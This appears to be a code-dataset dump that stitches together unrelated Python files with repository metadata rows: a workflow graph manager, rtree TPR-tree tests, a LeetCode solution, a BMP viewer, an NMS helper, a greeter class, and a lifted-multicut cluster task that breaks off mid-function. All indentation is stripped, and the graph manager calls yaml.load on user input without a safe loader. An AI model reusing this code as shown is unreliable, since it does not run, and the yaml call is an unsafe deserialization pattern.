|
"""
Meta manager. Defines complex workflow in terms of lower level managers
For usage example see tests
"""
import re
from time import time
import logging
from collections import defaultdict, OrderedDict as odict
from copy import copy, deepcopy
import yaml
from shub_workflow.base import WorkFlowManager
from .utils import get_scheduled_jobs_specs
logger = logging.getLogger(__name__)
_STARTING_JOB_RE = re.compile("--starting-job(?:=(.+))?")
class GraphManager(WorkFlowManager):
jobs_graph = {}
base_failed_outcomes = ('failed', 'killed by oom', 'cancelled', 'cancel_timeout', 'memusage_exceeded',
'cancelled (stalled)')
def __init__(self):
self.__failed_outcomes = list(self.base_failed_outcomes)
# Ensure jobs are traversed in the same order as they went pending.
self.__pending_jobs = odict()
self.__running_jobs = odict()
self._available_resources = {} # map resource : ammount
self._acquired_resources = defaultdict(list) # map resource : list of (job, ammount)
self.__tasks = {}
super(GraphManager, self).__init__()
self.__start_time = defaultdict(time)
for task in self.configure_workflow() or ():
self._add_task(task)
@property
def description(self):
return f"Workflow manager for {self.name!r}"
def _add_task(self, task):
assert task.task_id not in self.jobs_graph,\
"Workflow inconsistency detected: task %s referenced twice." % task.task_id
self.jobs_graph[task.task_id] = task.as_jobgraph_dict()
self.__tasks[task.task_id] = task
for ntask in task.get_next_tasks():
self._add_task(ntask)
def configure_workflow(self):
raise NotImplementedError("configure_workflow() method need to be implemented.")
def on_start(self):
if not self.jobs_graph:
self.argparser.error('Jobs graph configuration is empty.')
if not self.args.starting_job and not self.args.resume_from_jobid:
self.argparser.error('You must provide either --starting-job or --resume-from-jobid.')
self._fill_available_resources()
ran_tasks = self._maybe_setup_resume()
self._setup_starting_jobs(ran_tasks)
self.workflow_loop_enabled = True
logger.info("Starting '%s' workflow", self.name)
def _get_starting_jobs_from_resumed_job(self):
starting_jobs = []
job = self.get_project().jobs.get(self.args.resume_from_jobid)
next_option_is_task = False
for option in job.metadata.get('job_cmd'):
if next_option_is_task:
starting_jobs.append(option)
else:
m = _STARTING_JOB_RE.match(option)
if m:
task = m.groups()[0]
if m:
starting_jobs.append(task)
else:
next_option_is_task = True
return starting_jobs
def _maybe_setup_resume(self):
ran_tasks = []
if self.args.resume_from_jobid:
# fill tasks job ids
logger.info("Will Resume from job (%s)", self.args.resume_from_jobid)
for _, name, jobid in get_scheduled_jobs_specs(self, [self.args.resume_from_jobid]):
mname, taskid = name.split('/')
assert mname == self.name, "Resuming from wrong manager job: %s" % self.args.resume_from_jobid
self.__tasks[taskid].append_jobid(jobid)
ran_tasks.append(taskid)
return ran_tasks
def _setup_starting_jobs(self, ran_tasks, candidates=None):
candidates = candidates or self.args.starting_job
if not candidates: # resuming
candidates = self._get_starting_jobs_from_resumed_job()
for taskid in candidates:
if taskid in ran_tasks:
logger.info("Task %s already done %s.", taskid, tuple(self.__tasks[taskid].get_scheduled_jobs()))
next_tasks = [t.task_id for t in self.__tasks[taskid].get_next_tasks()]
if next_tasks:
self._setup_starting_jobs(ran_tasks, next_tasks)
else:
self._add_initial_pending_job(taskid)
logger.info("Resuming at task %s", taskid)
def _fill_available_resources(self):
"""
Ensure there are enough starting resources in order every job
can run at some point
"""
for job in self.jobs_graph.keys():
for required_resources in self.__tasks[job].get_required_resources():
for resource, req_amount in required_resources.items():
old_amount = self._available_resources.get(resource, 0)
if old_amount < req_amount:
logger.info("Increasing available resources count for %r"
" from %r to %r. Old value was not enough"
" for job %r to run.",
resource, old_amount, req_amount, job)
self._available_resources[resource] = req_amount
def get_job(self, job, pop=False):
if job not in self.jobs_graph:
self.argparser.error('Invalid job: %s. Available jobs: %s' % (job, repr(self.jobs_graph.keys())))
if pop:
return self.jobs_graph.pop(job)
return self.jobs_graph[job]
def _add_initial_pending_job(self, job):
wait_for = self.get_job(job).get('wait_for', [])
self._add_pending_job(job, wait_for=tuple(wait_for))
def _add_pending_job(self, job, wait_for=(), is_retry=False):
if job in self.args.skip_job:
return
if job in self.__tasks:
task = self.__tasks[job]
parallelization = task.get_parallel_jobs()
else:
task_id = self.get_job(job).get('origin', job)
task = self.__tasks[task_id]
parallelization = 1
if parallelization == 1:
self.__pending_jobs[job] = {
'wait_for': set(wait_for),
'is_retry': is_retry,
'wait_time': task.wait_time,
}
else:
# Split parallelized task into N parallel jobs.
basejobconf = self.get_job(job, pop=True)
for i in range(parallelization):
job_unit = "%s_%i" % (job, i)
job_unit_conf = deepcopy(basejobconf)
job_unit_conf['origin'] = job
job_unit_conf['index'] = i
for _, nextjobs in job_unit_conf.get('on_finish', {}).items():
if i != 0: # only job 0 will conserve finish targets
for nextjob in copy(nextjobs):
if nextjob != 'retry':
if nextjob in self.jobs_graph:
self.get_job(nextjob).setdefault('wait_for', []).append(job_unit)
if nextjob in self.__pending_jobs:
self.__pending_jobs[nextjob]['wait_for'].add(job_unit)
else:
for i in range(parallelization):
nextjobp = "%s_%i" % (job, i)
self.get_job(nextjobp).get('wait_for', []).append(job_unit)
if nextjobp in self.__pending_jobs:
self.__pending_jobs[nextjobp]['wait_for'].add(job_unit)
nextjobs.remove(nextjob)
self.jobs_graph[job_unit] = job_unit_conf
self.__pending_jobs[job_unit] = {
'wait_for': set(wait_for),
'is_retry': is_retry,
'origin': job,
'wait_time': task.wait_time,
}
for other, oconf in self.jobs_graph.items():
if job in oconf.get('wait_for', []):
oconf['wait_for'].remove(job)
if other in self.__pending_jobs:
self.__pending_jobs[other]['wait_for'].discard(job)
for i in range(parallelization):
job_unit = "%s_%i" % (job, i)
oconf['wait_for'].append(job_unit)
if other in self.__pending_jobs:
self.__pending_jobs[other]['wait_for'].add(job_unit)
def add_argparser_options(self):
super(GraphManager, self).add_argparser_options()
self.argparser.add_argument('--jobs-graph', help='Define jobs graph_dict on command line', default='{}')
self.argparser.add_argument('--starting-job', action='append', default=[],
help='Set starting jobs. Can be given multiple times.')
self.argparser.add_argument('--only-starting-jobs', action='store_true',
help='If given, only run the starting jobs (don\'t follow on finish next jobs)')
self.argparser.add_argument('--comment', help='Can be used for differentiate command line and avoid scheduling '
'fail when a graph manager job is scheduled when another one with same option '
'signature is running. Doesn\'t do anything else.')
self.argparser.add_argument('--skip-job', default=[], action='append',
help='Skip given job. Can be given multiple times. Also next jobs for the skipped'
'one will be skipped.')
self.argparser.add_argument('--resume-from-jobid', help='Resume from the given graph manager jobid')
def parse_args(self):
args = super(GraphManager, self).parse_args()
self.jobs_graph = yaml.load(args.jobs_graph) or deepcopy(self.jobs_graph)
if not self.name:
self.argparser.error('Manager name not set.')
return args
def workflow_loop(self):
logger.debug("Pending jobs: %r", self.__pending_jobs)
logger.debug("Running jobs: %r", self.__running_jobs)
logger.debug("Available resources: %r", self._available_resources)
logger.debug("Acquired resources: %r", self._acquired_resources)
self.check_running_jobs()
if self.__pending_jobs:
self.run_pending_jobs()
elif not self.__running_jobs:
return False
return True
def run_job(self, job, is_retry=False):
task = self.__tasks.get(job)
if task is not None:
return task.run(self, is_retry)
jobconf = self.get_job(job)
task = self.__tasks.get(jobconf['origin'])
if task is not None:
idx = jobconf['index']
return task.run(self, is_retry, index=idx)
def _must_wait_time(self, job):
status = self.__pending_jobs[job]
if status['wait_time'] is not None:
wait_time = status['wait_time'] - time() + self.__start_time[job]
if wait_time > 0:
logger.info("Job %s must wait %d seconds for running", job, wait_time)
return True
return False
def run_pending_jobs(self):
"""Try running pending jobs.
Normally, only jobs that have no outstanding dependencies are started.
If all pending jobs have outstanding dependencies, try to start one job
ignoring unknown tasks, i.e. those that are not currently pending.
If none of the pending jobs cannot be started either way, it means
there's a dependency cycle, in this case an error is raised.
"""
# Normal mode: start jobs without dependencies.
for job in sorted(self.__pending_jobs.keys()):
if len(self.__running_jobs) >= self.max_running_jobs:
break
status = self.__pending_jobs[job]
job_can_run = not status['wait_for'] and not self._must_wait_time(job) and self._try_acquire_resources(job)
if job_can_run:
try:
jobid = self.run_job(job, status['is_retry'])
except:
self._release_resources(job)
raise
self.__pending_jobs.pop(job)
self.__running_jobs[job] = jobid
if not self.__pending_jobs or self.__running_jobs or \
any(status['wait_time'] is not None for status in self.__pending_jobs.values()):
return
# At this point, there are pending jobs, but none were started because
# of dependencies, try "skip unknown deps" mode: start one job that
# only has "unseen" dependencies to try to break the "stalemate."
origin_job = None
for job in sorted(self.__pending_jobs.keys()):
if len(self.__running_jobs) >= self.max_running_jobs:
break
status = self.__pending_jobs[job]
job_can_run = (
all(w not in self.__pending_jobs for w in status['wait_for']) and
(not origin_job or status.get('origin') == origin_job) and
self._try_acquire_resources(job))
origin_job = status.get('origin')
if job_can_run:
try:
jobid = self.run_job(job, status['is_retry'])
except:
self._release_resources(job)
raise
self.__pending_jobs.pop(job)
self.__running_jobs[job] = jobid
if not origin_job and self.__running_jobs:
return
if self.__running_jobs:
return
# Nothing helped, all pending jobs wait for each other somehow.
raise RuntimeError("Job dependency cycle detected: %s" % ', '.join(
'%s waits for %s' % (
job, sorted(self.__pending_jobs[job]['wait_for']))
for job in sorted(self.__pending_jobs.keys())))
def check_running_jobs(self):
for job, jobid in list(self.__running_jobs.items()):
outcome = self.is_finished(jobid)
if outcome is not None:
logger.info('Job "%s/%s" (%s) finished', self.name, job, jobid)
for st in self.__pending_jobs.values():
st['wait_for'].discard(job)
for conf in self.jobs_graph.values():
if job in conf.get('wait_for', []):
conf['wait_for'].remove(job)
for nextjob in self._get_next_jobs(job, outcome):
if nextjob == 'retry':
jobconf = self.get_job(job)
retries = jobconf.get('retries', 0)
if retries > 0:
self._add_pending_job(job, is_retry=True)
jobconf['retries'] -= 1
logger.warning('Will retry job %s (outcome: %s, number of retries left: %s)',
job, outcome, jobconf['retries'])
elif nextjob in self.__pending_jobs:
logger.error('Job %s already pending', nextjob)
else:
wait_for = self.get_job(nextjob).get('wait_for', [])
self._add_pending_job(nextjob, wait_for)
self._release_resources(job)
self.__running_jobs.pop(job)
else:
logger.info("Job %s (%s) still running", job, jobid)
def _try_acquire_resources(self, job):
result = True
task_id = self.get_job(job).get('origin', job)
for required_resources in self.__tasks[task_id].get_required_resources(partial=True):
for resource, req_amount in required_resources.items():
if self._available_resources[resource] < req_amount:
result = False
break
else:
for resource, req_amount in required_resources.items():
self._available_resources[resource] -= req_amount
self._acquired_resources[resource].append((job, req_amount))
return True
return result
def _release_resources(self, job):
for res, acquired in self._acquired_resources.items():
for rjob, res_amount in acquired:
if rjob == job:
self._available_resources[res] += res_amount
self._acquired_resources[res].remove((rjob, res_amount))
def _get_next_jobs(self, job, outcome):
if self.args.only_starting_jobs:
return []
on_finish = self.get_job(job).get('on_finish', {})
if outcome in on_finish:
nextjobs = on_finish[outcome]
elif outcome in self.__failed_outcomes:
nextjobs = on_finish.get('failed', [])
else:
nextjobs = on_finish.get('default', [])
return nextjobs
@property
def pending_jobs(self):
return self.__pending_jobs
|
hermit-crab/shub-workflow
|
shub_workflow/graph/__init__.py
|
__init__.py
|
py
| 17,269 |
python
|
en
|
code
| null |
github-code
|
6
|
29250448134
|
from __future__ import annotations
import os
import unittest
from collections import defaultdict, namedtuple
from math import ceil
from typing import Any, Iterator
import numpy as np
from rtree.index import Index, Property, RT_TPRTree
class Cartesian(
namedtuple(
"Cartesian",
("id", "time", "x", "y", "x_vel", "y_vel", "update_time", "out_of_bounds"),
)
):
__slots__ = ()
def getX(self, t: float) -> float:
return self.x + self.x_vel * (t - self.time)
def getY(self, t: float) -> float:
return self.y + self.y_vel * (t - self.time)
def getXY(self, t: float) -> tuple[float, float]:
return self.getX(t), self.getY(t)
def get_coordinates(
self, t_now: float | None = None
) -> tuple[
tuple[float, float, float, float],
tuple[float, float, float, float],
float | tuple[float, float],
]:
return (
(self.x, self.y, self.x, self.y),
(self.x_vel, self.y_vel, self.x_vel, self.y_vel),
self.time if t_now is None else (self.time, t_now),
)
class QueryCartesian(
namedtuple("QueryCartesian", ("start_time", "end_time", "x", "y", "dx", "dy"))
):
__slots__ = ()
def get_coordinates(
self,
) -> tuple[
tuple[float, float, float, float],
tuple[float, float, float, float],
tuple[float, float],
]:
return (
(self.x - self.dx, self.y - self.dy, self.x + self.dx, self.y + self.dy),
(0, 0, 0, 0),
(self.start_time, self.end_time),
)
def data_generator(
dataset_size: int = 100,
simulation_length: int = 10,
max_update_interval: int = 20,
queries_per_time_step: int = 5,
min_query_extent: float = 0.05,
max_query_extent: float = 0.1,
horizon: int = 20,
min_query_interval: int = 2,
max_query_interval: int = 10,
agility: float = 0.01,
min_speed: float = 0.0025,
max_speed: float = 0.0166,
min_x: int = 0,
min_y: int = 0,
max_x: int = 1,
max_y: int = 1,
) -> Iterator[tuple[str, int, Any]]:
def create_object(
id_: float, time: float, x: float | None = None, y: float | None = None
) -> Cartesian:
# Create object with random or defined x, y and random velocity
if x is None:
x = np.random.uniform(min_x, max_x)
if y is None:
y = np.random.uniform(min_y, max_y)
speed = np.random.uniform(min_speed, max_speed)
angle = np.random.uniform(-np.pi, np.pi)
x_vel, y_vel = speed * np.cos(angle), speed * np.sin(angle)
# Set update time for when out of bounds, or max interval
for dt in range(1, max_update_interval + 1):
if not (0 < x + x_vel * dt < max_x and 0 < y + y_vel * dt < max_y):
out_of_bounds = True
update_time = time + dt
break
else:
out_of_bounds = False
update_time = time + max_update_interval
return Cartesian(id_, time, x, y, x_vel, y_vel, update_time, out_of_bounds)
objects = list()
objects_to_update = defaultdict(set)
for id_ in range(dataset_size):
object_ = create_object(id_, 0)
objects.append(object_)
objects_to_update[object_.update_time].add(object_)
yield "INSERT", 0, object_
for t_now in range(1, simulation_length):
need_to_update = ceil(dataset_size * agility)
updated_ids = set()
while need_to_update > 0 or objects_to_update[t_now]:
kill = False
if objects_to_update[t_now]:
object_ = objects_to_update[t_now].pop()
if object_ not in objects:
continue
kill = object_.out_of_bounds
else:
id_ = np.random.randint(0, dataset_size)
while id_ in updated_ids:
id_ = np.random.randint(0, dataset_size)
object_ = objects[id_]
updated_ids.add(object_.id)
need_to_update -= 1
yield "DELETE", t_now, object_
if kill:
x = y = None
else:
x, y = object_.getXY(t_now)
object_ = create_object(object_.id, t_now, x, y)
objects[object_.id] = object_
objects_to_update[object_.update_time].add(object_)
yield "INSERT", t_now, object_
for _ in range(queries_per_time_step):
x = np.random.uniform(min_x, max_x)
y = np.random.uniform(min_y, max_y)
dx = np.random.uniform(min_query_extent, max_query_extent)
dy = np.random.uniform(min_query_extent, max_query_extent)
dt = np.random.randint(min_query_interval, max_query_interval + 1)
t = np.random.randint(t_now, t_now + horizon - dt)
yield "QUERY", t_now, QueryCartesian(t, t + dt, x, y, dx, dy)
def intersects(
x1: float, y1: float, x2: float, y2: float, x: float, y: float, dx: float, dy: float
) -> bool:
# Checks if line from x1, y1 to x2, y2 intersects with rectangle with
# bottom left at x-dx, y-dy and top right at x+dx, y+dy.
# Implementation of https://stackoverflow.com/a/293052
# Check if line points not both more/less than max/min for each axis
if (
(x1 > x + dx and x2 > x + dx)
or (x1 < x - dx and x2 < x - dx)
or (y1 > y + dy and y2 > y + dy)
or (y1 < y - dy and y2 < y - dy)
):
return False
# Check on which side (+ve, -ve) of the line the rectangle corners are,
# returning True if any corner is on a different side.
calcs = (
(y2 - y1) * rect_x + (x1 - x2) * rect_y + (x2 * y1 - x1 * y2)
for rect_x, rect_y in (
(x - dx, y - dy),
(x + dx, y - dy),
(x - dx, y + dy),
(x + dx, y + dy),
)
)
sign = np.sign(next(calcs)) # First corner (bottom left)
return any(np.sign(calc) != sign for calc in calcs) # Check remaining 3
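# Worked example (not part of the original tests): the diagonal segment from
# (0, 0) to (1, 1) crosses the box of half-extents 0.25 centred at (0.5, 0.5),
# while a vertical segment far to the right of that box does not.
assert intersects(0, 0, 1, 1, 0.5, 0.5, 0.25, 0.25)
assert not intersects(2, 0, 2, 1, 0.5, 0.5, 0.25, 0.25)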
class TPRTests(unittest.TestCase):
def test_tpr(self) -> None:
# TODO : this freezes forever on some windows cloud builds
if os.name == "nt":
return
# Cartesians list for brute force
objects = dict()
tpr_tree = Index(properties=Property(type=RT_TPRTree))
for operation, t_now, object_ in data_generator():
if operation == "INSERT":
tpr_tree.insert(object_.id, object_.get_coordinates())
objects[object_.id] = object_
elif operation == "DELETE":
tpr_tree.delete(object_.id, object_.get_coordinates(t_now))
del objects[object_.id]
elif operation == "QUERY":
tree_intersect = set(tpr_tree.intersection(object_.get_coordinates()))
# Brute intersect
brute_intersect = set()
for tree_object in objects.values():
x_low, y_low = tree_object.getXY(object_.start_time)
x_high, y_high = tree_object.getXY(object_.end_time)
if intersects(
x_low,
y_low,
x_high,
y_high, # Line
object_.x,
object_.y,
object_.dx,
object_.dy,
): # Rect
brute_intersect.add(tree_object.id)
# Tree should match brute force approach
assert tree_intersect == brute_intersect
|
Toblerity/rtree
|
tests/test_tpr.py
|
test_tpr.py
|
py
| 7,681 |
python
|
en
|
code
| 573 |
github-code
|
6
|
48354201
|
from typing import *
import heapq
# TLE
# https://leetcode-cn.com/submissions/detail/292094052/testcase/
class Solution:
def busiestServers(self, k: int, arrival: List[int], load: List[int]) -> List[int]:
result = []
server_load = [0] * k
# 1 is available, 0 is busy
available_servers = [1] * k
task_end_heap = []
for i, a in enumerate(arrival):
# free the servers
while len(task_end_heap) > 0:
(end_time, server) = heapq.heappop(task_end_heap)
if end_time <= a:
available_servers[server] = 1
else:
heapq.heappush(task_end_heap, (end_time, server))
break
# assign the new request
server = i % k
if available_servers[server]:
available_servers[server] = 0
heapq.heappush(task_end_heap, (a + load[i], server))
server_load[server] += 1
else:
if sum(available_servers) == 0:
# all servers are busy
# drop the request
continue
j = (server + 1) % k
while j != server and not available_servers[j]:
j += 1
j %= k
server = j
if available_servers[server]:
available_servers[server] = 0
heapq.heappush(task_end_heap, (a + load[i], server))
server_load[server] += 1
else:
# drop the request
continue
max_load = max(server_load)
result = [i for i, x in enumerate(server_load) if x == max_load]
return result
if __name__ == "__main__":
s = Solution()
k = 3
arrival = [1,2,3,4,5]
load = [5,2,3,3,3]
result = s.busiestServers(k, arrival, load)
assert result == [1]
k = 3
arrival = [1,2,3,4]
load = [1,2,1,2]
result = s.busiestServers(k, arrival, load)
assert result == [0]
|
code-cp/leetcode
|
solutions/1606/main.py
|
main.py
|
py
| 2,144 |
python
|
en
|
code
| 0 |
github-code
|
6
|
22354810782
|
from tkinter import ttk
import bitmap
from tkinter import Tk, mainloop, Canvas, PhotoImage, filedialog
def rgb2hex(r, g, b):
"""
Convert an r,g,b colour to a hex code
"""
return "#{:02x}{:02x}{:02x}".format(r, g, b)
class Root(Tk):
"""
This is the root object, which inherits from TK
The benefit of inheritance is we can write:
self.button instead of self.root.button
"""
def __init__(self):
super(Root, self).__init__()
self.title("BMP compression analyzer")
self.minsize(640, 400)
self.row = 3
self.labelFrame = ttk.LabelFrame(self, text="Open File")
self.labelFrame.grid(column=0, row=1, padx=20, pady=20)
self.button()
def get_row(self):
self.row += 1
return self.row
def button(self):
self.button = ttk.Button(
self.labelFrame, text="Browse A File", command=self.file_dialog
)
self.button.grid(column=1, row=1)
def file_dialog(self):
"""
Opens a file dialog and has the user chose a file
This then sets some labels afterwards
"""
self.filename = filedialog.askopenfilename(
initialdir="./", title="Select A File",
)
self.label = ttk.Label(self.labelFrame, text="")
self.label.grid(column=1, row=2)
self.label.configure(text=self.filename)
if self.filename:
self.get_bmp_info(self.filename)
def get_bmp_info(self, filename):
"""
Print some information about the bmp file
Shows on the UI bmp
"""
with open(filename, "rb") as bmp_file:
bmp_data = bitmap.Image(bmp_file.read())
self.show_image(
bmp_data.getBitmapWidth(),
bmp_data.getBitmapHeight(),
bmp_data.getPixels(),
self.get_row(),
0,
)
def show_image(self, width, height, pixels, row, col):
"""
Add an image to the gui
"""
self.canvas = Canvas(self, width=width, height=height)
self.canvas.grid(column=col, row=row)
img = PhotoImage(width=width, height=height)
self.canvas.create_image((width / 2, height / 2), image=img, state="normal")
self.canvas.image = img
for y_index, y in enumerate(pixels):
for x_index, x in enumerate(y):
blue, green, red = x
hex_code = rgb2hex(r=red, g=green, b=blue)
                # Flip vertically (BMP rows are stored bottom-up); -1 keeps the index in range.
                img.put(hex_code, (x_index, height - 1 - y_index))
if __name__ == "__main__":
root = Root()
root.mainloop()
|
SinaKhalili/bmp-compressor
|
main.py
|
main.py
|
py
| 2,646 |
python
|
en
|
code
| 0 |
github-code
|
6
|
4886937902
|
import numpy as np
import torch
def ious(box, boxes, isMin = False):  # define the IoU function
    box_area = (box[3] - box[1]) * (box[4] - box[2])  # area of the box with the highest confidence
    area = (boxes[:, 3] - boxes[:, 1]) * (boxes[:, 4] - boxes[:, 2])  # areas of all the other boxes
    xx1 = torch.max(box[1], boxes[:, 1])  # x coordinate of the intersection's top-left corner (the rest follow the same idea)
    yy1 = torch.max(box[2], boxes[:, 2])
    xx2 = torch.min(box[3], boxes[:, 3])
    yy2 = torch.min(box[4], boxes[:, 4])
    # w = torch.max(0, xx2 - xx1)
    # h = torch.max(0, yy2 - yy1)  # the maximum could also be taken this way
    w = torch.clamp(xx2 - xx1, min=0)  # clamp at zero
    h = torch.clamp(yy2 - yy1, min=0)
    inter = w * h  # intersection area
    # ovr1 = inter/torch.min(box_area, area)
    ovr2 = inter/ (box_area + area - inter)  # intersection area / union area
    # ovr = torch.max(ovr2,ovr1)
    # if isMin:  # choose between intersection/union and intersection/min-area (handles a small box nested inside a large one)
    #
    #     ovr = inter / torch.min(box_area, area)
    # else:
    #     ovr = inter / (box_area + area - inter)
    return ovr2
def nms(boxes, thresh=0.5, isMin = True):  # NMS with three parameters: boxes, confidence threshold, whether to use the minimum area
    if boxes.shape[0] == 0:  # if there are no boxes, return an empty tensor so the code does not crash
        return torch.Tensor([])
    _boxes = boxes[(-boxes[:, 0]).argsort()]  # sort the boxes by confidence in descending order
    r_boxes = []  # empty list to collect the boxes that qualify
    while _boxes.shape[0] > 1:  # loop while more than one box remains
        a_box = _boxes[0]  # take the first box (highest confidence) as the reference box for IoU with the others
        b_boxes = _boxes[1:]  # take all the remaining boxes
        r_boxes.append(a_box)  # add the first box to the list
        # print(iou(a_box, b_boxes))
        index = torch.where(ious(a_box, b_boxes,isMin) < thresh)  # keep the boxes whose IoU with the reference is below the threshold and return their indices
        _boxes = b_boxes[index]  # take those boxes by index and overwrite _boxes with them
        if _boxes.shape[0] > 0:  # check whether a last box remains
            r_boxes.append(_boxes[0])  # add the last box (it belongs to a different object) to the list
return torch.stack(r_boxes)
if __name__ == '__main__':
# a = np.array([1,1,11,11])
# bs = np.array([[1,1,10,10],[11,11,20,20]])
# print(iou(a,bs))
bs = torch.tensor([[1, 1, 10, 10, 40,8], [1, 1, 9, 9, 10,9], [9, 8, 13, 20, 15,3], [6, 11, 18, 17, 13,2]])
# print(bs[:,3].argsort())
print(nms(bs))
|
RockingHorse-L/yolov3
|
YOLOV3/tool1.py
|
tool1.py
|
py
| 2,668 |
python
|
zh
|
code
| 2 |
github-code
|
6
|
37197760033
|
from datetime import datetime
class Greeter:
def __init__(self, name):
self.name = name
    @staticmethod
    def day():
        return datetime.now().strftime('%A')
    @staticmethod
    def part_of_day():  # Determines the part of the day based on the current hour
        current_hour = datetime.now().hour
        if current_hour < 12:
            part_of_day = "morning"
        elif 12 <= current_hour < 17:
            part_of_day = 'afternoon'
        else:
            part_of_day = 'evening'
        return part_of_day
    def greet(self, store):  # Prints the greeting using all the computed parts
        print(f'Hello, my name is {self.name}, and welcome '
              f'to {store}!')
        print(f'Have a pleasant {self.day()} {self.part_of_day()}')
        print('Here is a 20% discount coupon for you!')
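# Hypothetical usage example (the name and store below are made up):
if __name__ == '__main__':
    greeter = Greeter('Anna')
    greeter.greet('the corner store')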
|
alecksandr-slavin/git_work
|
stepick_v1/new.py
|
new.py
|
py
| 980 |
python
|
ru
|
code
| 0 |
github-code
|
6
|
650322467
|
#! /bin/python
import os
import sys
import json
from concurrent import futures
import numpy as np
import vigra
import luigi
import z5py
import nifty
import nifty.tools as nt
import nifty.distributed as ndist
from elf.segmentation.lifted_multicut import get_lifted_multicut_solver
from elf.segmentation.multicut import get_multicut_solver
import cluster_tools.utils.volume_utils as vu
import cluster_tools.utils.function_utils as fu
from cluster_tools.cluster_tasks import SlurmTask, LocalTask, LSFTask
#
# Lifted Multicut Tasks
#
class SolveLiftedSubproblemsBase(luigi.Task):
""" SolveLiftedSubproblems base class
"""
task_name = 'solve_lifted_subproblems'
src_file = os.path.abspath(__file__)
# input volumes and graph
problem_path = luigi.Parameter()
lifted_prefix = luigi.Parameter()
scale = luigi.IntParameter()
#
dependency = luigi.TaskParameter()
def requires(self):
return self.dependency
def clean_up_for_retry(self, block_list):
super().clean_up_for_retry(block_list)
# TODO remove any output of failed blocks because it might be corrupted
@staticmethod
def default_task_config():
        # we use this to also get the common default config
config = LocalTask.default_task_config()
config.update({'agglomerator': 'kernighan-lin',
'time_limit_solver': None})
return config
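    # Example (sketch, values illustrative): a task config merged on top of these defaults
    # might contain {"agglomerator": "kernighan-lin", "time_limit_solver": 3600,
    # "threads_per_job": 4} once written to disk by the workflow.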
def run_impl(self):
# get the global config and init configs
# shebang, block_shape, roi_begin, roi_end = self.global_config_values()
shebang, block_shape, roi_begin, roi_end, block_list_path\
= self.global_config_values(with_block_list_path=True)
self.init(shebang)
with vu.file_reader(self.problem_path, 'r') as f:
shape = tuple(f['s0/graph'].attrs['shape'])
factor = 2**self.scale
block_shape = tuple(bs * factor for bs in block_shape)
# update the config with input and graph paths and keys
# as well as block shape
config = self.get_task_config()
config.update({'problem_path': self.problem_path, 'scale': self.scale,
'block_shape': block_shape, 'lifted_prefix': self.lifted_prefix})
# make output datasets
out_key = 's%i/sub_results_lmc' % self.scale
with vu.file_reader(self.problem_path) as f:
out = f.require_group(out_key)
# NOTE, gzip may fail for very small inputs, so we use raw compression for now
# might be a good idea to give blosc a shot ...
out.require_dataset('cut_edge_ids', shape=shape, chunks=block_shape,
compression='raw', dtype='uint64')
out.require_dataset('node_result', shape=shape, chunks=block_shape,
compression='raw', dtype='uint64')
if self.n_retries == 0:
block_list = vu.blocks_in_volume(shape, block_shape, roi_begin, roi_end,
block_list_path)
else:
block_list = self.block_list
self.clean_up_for_retry(block_list)
n_jobs = min(len(block_list), self.max_jobs)
# prime and run the jobs
prefix = 's%i' % self.scale
self.prepare_jobs(n_jobs, block_list, config, prefix)
self.submit_jobs(n_jobs, prefix)
# wait till jobs finish and check for job success
self.wait_for_jobs()
self.check_jobs(n_jobs, prefix)
# part of the luigi API
def output(self):
return luigi.LocalTarget(os.path.join(self.tmp_folder,
self.task_name + '_s%i.log' % self.scale))
class SolveLiftedSubproblemsLocal(SolveLiftedSubproblemsBase, LocalTask):
""" SolveLiftedSubproblems on local machine
"""
pass
class SolveLiftedSubproblemsSlurm(SolveLiftedSubproblemsBase, SlurmTask):
""" SolveLiftedSubproblems on slurm cluster
"""
pass
class SolveLiftedSubproblemsLSF(SolveLiftedSubproblemsBase, LSFTask):
""" SolveLiftedSubproblems on lsf cluster
"""
pass
#
# Implementation
#
def _find_lifted_edges(lifted_uv_ids, node_list):
lifted_indices = np.arange(len(lifted_uv_ids), dtype='uint64')
# find overlap of node_list with u-edges
inner_us = np.in1d(lifted_uv_ids[:, 0], node_list)
inner_indices = lifted_indices[inner_us]
inner_uvs = lifted_uv_ids[inner_us]
# find overlap of node_list with v-edges
inner_vs = np.in1d(inner_uvs[:, 1], node_list)
return inner_indices[inner_vs]
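# _find_lifted_edges sketch: with lifted_uv_ids = [[0, 5], [1, 7], [2, 3]] and
# node_list = [0, 2, 3], only the pair [2, 3] has both endpoints in node_list,
# so the function returns [2].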
def _solve_block_problem(block_id, graph, uv_ids, ds_nodes,
costs, lifted_uvs, lifted_costs,
lifted_solver, solver,
ignore_label, blocking, out, time_limit):
fu.log("Start processing block %i" % block_id)
# load the nodes in this sub-block and map them
# to our current node-labeling
chunk_id = blocking.blockGridPosition(block_id)
nodes = ds_nodes.read_chunk(chunk_id)
if nodes is None:
fu.log_block_success(block_id)
return
# if we have an ignore label, remove zero from the nodes
# (nodes are sorted, so it will always be at pos 0)
if ignore_label and nodes[0] == 0:
nodes = nodes[1:]
removed_ignore_label = True
if len(nodes) == 0:
fu.log_block_success(block_id)
return
else:
removed_ignore_label = False
# we allow for invalid nodes here,
# which can occur for un-connected graphs resulting from bad masks ...
inner_edges, outer_edges = graph.extractSubgraphFromNodes(nodes, allowInvalidNodes=True)
    # if we have no inner edges, return
    # the outer edges as cut edges
if len(inner_edges) == 0:
if len(nodes) > 1:
assert removed_ignore_label,\
"Can only have trivial sub-graphs for more than one node if we removed ignore label"
cut_edge_ids = outer_edges
sub_result = None
fu.log("Block %i: has no inner edges" % block_id)
# otherwise solve the multicut for this block
else:
# find the lifted uv-ids that correspond to the inner edges
inner_lifted_edges = _find_lifted_edges(lifted_uvs, nodes)
fu.log("Block %i: Solving sub-block with %i nodes, %i edges and %i lifted edges" % (block_id,
len(nodes),
len(inner_edges),
len(inner_lifted_edges)))
sub_uvs = uv_ids[inner_edges]
# relabel the sub-nodes and associated uv-ids for more efficient processing
nodes_relabeled, max_id, mapping = vigra.analysis.relabelConsecutive(nodes,
start_label=0,
keep_zeros=False)
sub_uvs = nt.takeDict(mapping, sub_uvs)
n_local_nodes = max_id + 1
sub_graph = nifty.graph.undirectedGraph(n_local_nodes)
sub_graph.insertEdges(sub_uvs)
sub_costs = costs[inner_edges]
assert len(sub_costs) == sub_graph.numberOfEdges
# we only need to run lifted multicut if we have lifted edges in
# the subgraph
if len(inner_lifted_edges) > 0:
fu.log("Block %i: have lifted edges and use lifted multicut solver" % block_id)
sub_lifted_uvs = nt.takeDict(mapping, lifted_uvs[inner_lifted_edges])
sub_lifted_costs = lifted_costs[inner_lifted_edges]
# solve multicut and relabel the result
sub_result = lifted_solver(sub_graph, sub_costs, sub_lifted_uvs, sub_lifted_costs,
time_limit=time_limit)
